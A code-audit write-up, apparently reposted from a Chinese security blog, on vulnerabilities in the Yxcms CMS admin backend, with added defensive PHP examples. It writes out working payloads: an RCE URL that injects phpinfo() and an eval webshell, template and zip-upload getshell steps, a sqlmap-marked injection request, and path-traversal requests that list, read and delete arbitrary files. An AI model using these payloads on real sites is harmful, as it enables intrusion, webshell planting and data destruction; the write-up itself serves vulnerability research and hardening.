Yxcms Code Audit: Backend RCE (0day)

admin · 30 September 2024, 12:11:26
Disclaimer: this article is only for sharing network-security knowledge; the environment is a local lab machine. Strictly comply with the relevant network-security laws and regulations.
Anyone who uses the techniques in this article for illegal activities without authorization bears all consequences themselves. The Jie安全 official account and the author accept no legal responsibility.
It started while I was working through an internal-network lab: the target was running Yxcms, and the scan turned up its source code.
Almost every getshell method published online goes through adding or editing template files, so I decided to audit the code and see whether there were other ways to get a shell. That is how this article came about.
RCE
The vulnerability is in the setdefault method of yxcms/protected/apps/appmanage/controller/indexController.php. It is essentially the same pattern as the template editor: both use file_put_contents to write a file. Although $file is not controllable here, the app value passed in is not filtered at all.
First follow getApp: it simply receives the app parameter and returns its value.
Whatever the regex in between does, build a link and see what happens:
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=123
The value of app is written straight into index.php.
Visit the site root:
Write a phpinfo(); to check whether anything is filtered.
Nothing is filtered, but it does not execute, because the value lands inside a quoted string.
Close the string with ') and the final payload is:
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');phpinfo();//
This turns every page of the site into a phpinfo page.
The site only recovers once the marked portion is deleted from index.php.
Writing a webshell
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');@eval($_POST[wj]);//
Connect with AntSword (蚁剑):
Getshell
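The root cause above is request input spliced unfiltered into PHP source by file_put_contents. The following is an added example of the check such a handler needs, written for this write-up and not Yxcms's own code; the directory layout, file names and function names are assumptions.

```php
<?php
// Added example, not Yxcms's own code: a hardened shape for a "set default app"
// handler. The write-up shows the app value reaching file_put_contents
// unfiltered; here it is validated first and persisted as data rather than
// spliced into hand-assembled PHP source. All names are hypothetical.
declare(strict_types=1);

// Accept only a plain identifier that names an app directory sitting directly
// under $appsDir. Characters such as ')', ';', '/', '.' and whitespace are
// rejected, so the quote-and-comment shape from the write-up never reaches
// the file.
function validate_app_name(string $appsDir, string $app): ?string
{
    if (!preg_match('/^[a-z][a-z0-9_]{0,31}$/', $app)) {
        return null;
    }
    $base = realpath($appsDir);
    $dir  = realpath($appsDir . '/' . $app);
    if ($base === false || $dir === false || !is_dir($dir) || dirname($dir) !== $base) {
        return null;   // not a real app directory nested directly in $appsDir
    }
    return $app;
}

// Persist the setting with var_export, which emits a correctly quoted literal,
// instead of concatenating raw request input into a line of PHP.
function write_default_app(string $appsDir, string $app, string $settingsFile): bool
{
    $safe = validate_app_name($appsDir, $app);
    if ($safe === null) {
        return false;
    }
    $code = "<?php\nreturn " . var_export(['default_app' => $safe], true) . ";\n";
    return file_put_contents($settingsFile, $code, LOCK_EX) !== false;
}

// Demo with a constructed scratch layout (one app named "default").
$apps = sys_get_temp_dir() . '/yx_demo/apps';
@mkdir($apps . '/default', 0700, true);
$settings = sys_get_temp_dir() . '/yx_demo/default_app.php';

var_dump(write_default_app($apps, 'default', $settings));          // installed app: accepted
var_dump(write_default_app($apps, "');phpinfo();//", $settings));  // fails the identifier regex
var_dump(write_default_app($apps, 'nonexistent', $settings));      // not an installed app
```

The settings file produced this way is loaded with a plain include and returns an array, so the default app is never executed as code assembled from request input.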
The other three getshell spots found during the audit had already been discovered by others: one is the template editor, the other two are zip file uploads.
Template getshell
One at tpadd:
After creating it, open:
http://192.168.0.106/protected/apps/default/view/default/wj.php
One at tpedit:
After editing, open:
http://192.168.0.106/protected/apps/default/view/default/acomment.php
ZIP upload getshell 1
The uploaded zip must contain a config.php file, and its file name must not collide with a zip that has already been uploaded.
Put two files in the archive: a config.php and a phpinfo file.
Upload it:
Then visit:
http://192.168.0.106/protected/apps/wj/wj.php
ZIP upload getshell 2
Reuse the zip from above, fetched through the online-install endpoint:
http://192.168.0.106/index.php?r=appmanage/index/onlineinstall&url=http://192.168.0.106/wj.zip
Then visit:
http://192.168.0.106/protected/apps/wj/wj.php
SQL injection
The way this SQL is written, there is no defending it. Sigh. None at all.
Go all in with sqlmap. The request used (the * marks the injection point):
POST /index.php?r=admin/sort/newsedit&id=100024 HTTP/1.1
Host: 192.168.0.106
Content-Length: 1309
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1mQQezLmVeBrWBoX
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close

------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="parentid"

0
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="sortname"

分类信息
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="picture"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="oldpicture"

------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="keywords"

分类信息演示
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="description"

分类信息演示
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="num"

10
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="tplist"

news_sortindex
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="cnlist"

news_content*
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="norder"

0
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="ifmenu"

1
------WebKitFormBoundary1mQQezLmVeBrWBoX
Content-Disposition: form-data; name="extendid"

0
------WebKitFormBoundary1mQQezLmVeBrWBoX--


Where there is a first injection there is a second. Time is precious, so I did not dig further.

Directory traversal


The filtering here is ineffective:

http://192.168.0.106/index.php?r=admin/files/index&dirget=/../../../../../../../


There are several more directory traversal spots; I am not writing the others up.

Arbitrary file deletion

Again the filtering is ineffective:
http://192.168.0.106/index.php?r=admin/files/del&fname=../../../../../../../../../../../../../1.txt
There are also several more arbitrary file deletion spots; not writing those up either.
Arbitrary file read
The file name and path are concatenated without checks, so traversal works through either parameter. Via Mname:
POST /index.php?r=admin/set/tpgetcode HTTP/1.1
Host: 192.168.0.106
Content-Length: 50
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close

Mname=/../../../../../../../../../../&fname=/1.csv
And via fname:

POST /index.php?r=admin/set/tpgetcode HTTP/1.1
Host: 192.168.0.106
Content-Length: 50
Cache-Control: max-age=0
Origin: http://192.168.0.106
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b;
Connection: close

Mname=/&fname=/../../../../../../../../../../1.csv
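The directory traversal, arbitrary file deletion and arbitrary file read above all come from joining a user-supplied name onto a base path behind an ineffective filter. The following added example, not Yxcms's code, shows the path confinement those handlers lack: canonicalise with realpath and prefix-check, rather than stripping '../'; the function names and scratch directory are assumptions.

```php
<?php
// Added example, not Yxcms's own code: confining a user-supplied file or
// directory name to a base directory. This is the check the files/index,
// files/del and set/tpgetcode handlers above lack. Function names and the
// scratch directory are hypothetical.
declare(strict_types=1);

// Returns the canonical path if it stays inside $base, otherwise null.
// Canonicalising with realpath and then comparing prefixes is not bypassable
// with '..../', encoded dots or symlinks, unlike a filter that strips '../'.
function resolve_within_base(string $base, string $userPath): ?string
{
    $realBase = realpath($base);
    if ($realBase === false || strpos($userPath, "\0") !== false) {
        return null;   // no base, or a NUL byte that could truncate the path
    }
    $candidate = realpath($realBase . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\'));
    if ($candidate === false) {
        return null;   // nothing exists there: nothing to list, read or delete
    }
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $realBase && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;   // resolved outside the base directory
    }
    return $candidate;
}

// Deletion handler shape: only regular files already confined to $base.
function delete_managed_file(string $base, string $fname): bool
{
    $path = resolve_within_base($base, $fname);
    return $path !== null && is_file($path) && unlink($path);
}

// Read handler shape for a "module + file name" pair as in tpgetcode: join the
// two parts first, then confine the result once.
function read_managed_file(string $base, string $mname, string $fname): ?string
{
    $path = resolve_within_base($base, trim($mname, '/\\') . '/' . ltrim($fname, '/\\'));
    return ($path !== null && is_file($path)) ? file_get_contents($path) : null;
}

// Demo with a constructed scratch directory.
$base = sys_get_temp_dir() . '/yx_managed';
@mkdir($base, 0700, true);
file_put_contents($base . '/1.csv', "a,b\n");
var_dump(read_managed_file($base, '/', '/1.csv'));                                    // inside base: read
var_dump(read_managed_file($base, '/../../../../../../../../../../', '/1.csv'));      // traversal via Mname: rejected
var_dump(delete_managed_file($base, '../../../../../../../../../../../../../1.txt')); // traversal via fname: rejected
```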

Originally published on the WeChat official account Jie安全: Yxcms代码审计后台RCE(0day)

Reposts must keep the original link (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/3222169.html
